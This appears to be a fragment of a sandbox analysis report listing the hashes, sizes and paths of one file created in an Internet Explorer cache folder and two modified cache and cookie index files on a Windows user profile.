SHA1: 6fb5662a14a79f7908b673bce6f5f44cb02b6cf1
SHA256: 8f648992dce9dc56dfab5cfadfa7aafd1c1329c2f2f47411fc941effe765a48d
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt (Created File)
Size 36.40 KB (37272 bytes)
Hash Values MD5: 3ecca40e5dc9f0107f5d9ae500177878
SHA1: 947876a5a40257ba6da4021ad4bc8b5317dbdd03
SHA256: 5947ddcc53d38842b7e5bf1aaab70822f2982fe1859183304c2ebd3e5d2f72f0
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat
File Properties
Names c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat (Modified File)
Size 48.00 KB (49152 bytes)
Hash Values MD5: 9f1ab0535bfe55d2abb1f6e6adf846bd
SHA1: 50f06d017905b347a5155f877fcf966db327dd40
SHA256: 7978882c50b68ce6e541aa765a7a98907cc56c4f1dd794a92766b2f23df85c73
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat
File Properties
Names c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat (Modified File)
Size 32.00 KB (32768 bytes)
Hash Values MD5: 50d06047bd7adf336c6a8dd390506ff3
SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582
SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e